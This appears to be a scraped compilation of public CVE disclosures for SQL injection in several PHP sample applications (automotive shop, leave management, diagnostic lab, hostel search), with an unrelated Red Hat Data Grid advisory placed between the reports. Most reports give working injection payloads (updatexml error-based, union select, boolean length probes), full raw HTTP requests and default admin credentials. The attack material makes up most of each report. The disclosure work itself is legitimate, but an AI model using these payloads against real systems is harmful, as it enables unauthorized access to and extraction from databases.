Automotive Shop Management System v1.0 is vulnerable to SQL via /asms/classes/Master.php?f=delete_mechanic.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: suikirakira

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_mechanic

Vulnerability location: /asms/classes/Master.php?f=delete\_mechanic, id

dbname =asms\_db,length=7

\[+\] Payload: id=3 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=3 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44378: bug_report/SQLi-1.md at main · suikirakira/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: suikirakira

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_service

Vulnerability location: /asms/classes/Master.php?f=delete\_service, id

dbname =asms\_db,length=7

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44379: bug_report/SQLi-2.md at main · suikirakira/bug_report

Red Hat Security Advisory 2022-8524-01 - Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 8.4.0 replaces Data Grid 8.3.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.4.0 in the Release Notes[3]. Issues addressed include cross site scripting and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Data Grid 8.4.0 security update  
Advisory ID:       RHSA-2022:8524-01  
Product:           Red Hat JBoss Data Grid  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8524  
Issue date:        2022-11-17  
CVE Names:         CVE-2022-0235 CVE-2022-23647 CVE-2022-24823   
                   CVE-2022-25857 CVE-2022-38749 CVE-2022-38750   
                   CVE-2022-38751 CVE-2022-38752   
=====================================================================

1. Summary:

An update for Red Hat Data Grid 8 is now available.

 Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution.  
It increases application response times and allows for dramatically  
improving performance while providing availability, reliability, and  
elastic scale.

 Data Grid 8.4.0 replaces Data Grid 8.3.1 and includes bug fixes and  
enhancements. Find out more about Data Grid 8.4.0 in the Release Notes[3].

Security Fix(es):

* prismjs: improperly escaped output allows a XSS (CVE-2022-23647)

* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections (CVE-2022-25857)

* node-fetch: exposure of sensitive information to an unauthorized actor  
(CVE-2022-0235)

* netty: world readable temporary file containing sensitive data  
(CVE-2022-24823)

* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.composer.Composer.composeSequenceNode (CVE-2022-38749)

* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.constructor.BaseConstructor.constructObject  
(CVE-2022-38750)

* snakeyaml: Uncaught exception in  
java.base/java.util.regex.Pattern$Ques.match (CVE-2022-38751)

* snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode  
(CVE-2022-38752)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

To install this update, do the following:

 1. Download the Data Grid 8.4.0 Server patch from the customer portal[²].  
2. Back up your existing Data Grid installation. You should back up  
databases, configuration files, and so on.  
3. Install the Data Grid 8.4.0 Server patch.  
4. Restart Data Grid to ensure the changes take effect.

For more information about Data Grid 8.4.0, refer to the 8.4.0 Release  
Notes[³]

4. Bugs fixed (https://bugzilla.redhat.com/):

2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor  
2056643 - CVE-2022-23647 prismjs: improperly escaped output allows a XSS  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode  
2129707 - CVE-2022-38750 snakeyaml: Uncaught exception in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject  
2129709 - CVE-2022-38751 snakeyaml: Uncaught exception in java.base/java.util.regex.Pattern$Ques.match  
2129710 - CVE-2022-38752 snakeyaml: Uncaught exception in java.base/java.util.ArrayList.hashCode

5. References:

https://access.redhat.com/security/cve/CVE-2022-0235  
https://access.redhat.com/security/cve/CVE-2022-23647  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-38749  
https://access.redhat.com/security/cve/CVE-2022-38750  
https://access.redhat.com/security/cve/CVE-2022-38751  
https://access.redhat.com/security/cve/CVE-2022-38752  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381&product=data.grid&version=8.4&downloadType=patches  
https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.4/html-single/red_hat_data_grid_8.4_release_notes/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3aDp9zjgjWX9erEAQguCQ/+OYKKaLAAtbNiCNTq3llsyPpuRIEQFoK/  
tAgdAwRlSYz3Cwyx9tEMKND3UdoYlncZgepk/slYEBURSYiZygSRUXy7z2ZqOpQP  
IReuW55RqG2x6v1BAr4I2NruG/8wi0k6QxeBrl48PYtiq19LT4aAb4tZJ1VKhTQX  
LCWncEs+xxRpqRLFSQT7IMRekkOcUmo2lxls4exjpPgOBtHvGiuppXFK1Um7eh6i  
Gl5icTyhrxtHeAkWsEN0/K6akPHsWYr/mM7BFOpVE5LIa00TFJ9g0wxHg/qVNEh5  
2i8sWjz0mybc6rNUvYoa3vsx88x8ASD/rH/qrqRkqcNwiOzuQD3B4843eXxPQSS6  
dRre/qbUQQuz/PatKPFtBqAzQlXVwR29fOJcV74G6kY2/37+5d4GCfU5AcgRzAVn  
1fQElIcjM8/0mn9+65JoDNoEA8k8BbJyb9+jMTvPeu5AkalTp5wkYO78mjRVDba+  
g1Rhz4Ewo6KTxr5K7txFi0ukoc9P/Li5Tbp2Q8+a9bvMnggDZZyU1PXWtLCkC9kD  
vqbue19Z8TfqoX1WDL/T0o4Go6KWaQBbH6FoP10o2rfcvn13QeiIw9kImQ99qGap  
75uV9D2R7TWPBm843qBta57MuUO1uaZDOUlk+8V0+5sNN4SKRUZIoGnDT29WVS+U  
pdFf1sazxWU=  
=m90N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8524-01

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /admin/?page=user/manage_user&id=.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: SunQingYu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/?page=user/manage\_user&id=

Vulnerability location: /leave\_system/admin/?page=user/manage\_user&id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/?page=user/manage\_user&id=12%27%20and%20length(database())%20=9--+ // Leak place ---> id

GET /leave\_system/admin/?page\=user/manage\_user&id\=12%27%20and%20length(database())%20\=9\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-43179: bug_report/SQLi-1.md at main · debug601/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /clients/view_client.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Linwei

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/clients/view\_client.php?id=

Vulnerability location: /odlms/admin/clients/view\_client.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/clients/view\_client.php?id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> id

GET /odlms/admin/clients/view\_client.php?id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43163: bug_report/SQLi-1.md at main · Zer0vAv/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /tests/view_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhangyushi

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/view\_test.php?id=

Vulnerability location: /odlms/admin/tests/view\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/view\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/view\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43162: bug_report/SQLi-1.md at main · zys20201225/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/?page=user/manage_user&id=.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: acvxd

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/?page=user/manage\_user&id=

Vulnerability location: /asms/admin/?page=user/manage\_user&id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44403: bug_report/SQLi-1.md at main · acvxd/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_transaction.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: acvxd

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_transaction

Vulnerability location: /asms/classes/Master.php?f=delete\_transaction, id

dbname =asms\_db,length=7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Master.php?f\=delete\_transaction HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44402: bug_report/SQLi-2.md at main · acvxd/bug_report

A vulnerability has been found in Hostel Searching Project and classified as critical. This vulnerability affects unknown code of the file view-property.php. The manipulation of the argument property_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213844.

**SQL injection vulnerability exists in Hostel searching project****1.Build environment**

Aapche2.4.39; MySQL5.7.26； PHP8.0.2

**2.Vulnerability analysis**

view-property.php：

property\_ ID is assigned to $property\_ The ID variable is then brought into the database for query, and the query result is returned. During this process, the property\_ The ID is brought into the database without being filtered, thus creating a SQL injection vulnerability

*   We can use sqlmap to validate

*   Manual SQL injection proof

**3.POC**

    http://127.0.0.1/view-property.php?property_id=127' or (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace

CVE-2022-4051: SQL injection vulnerability exists in Hostel searching project · Issue #1 · itzmehedi/Hostel-searching-project-using-PHP-Mysql

A vulnerability was found in Student Attendance Management System and classified as critical. This issue affects some unknown processing of the file /Admin/createClass.php. The manipulation of the argument Id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213845 was assigned to this vulnerability.

Tag

#sql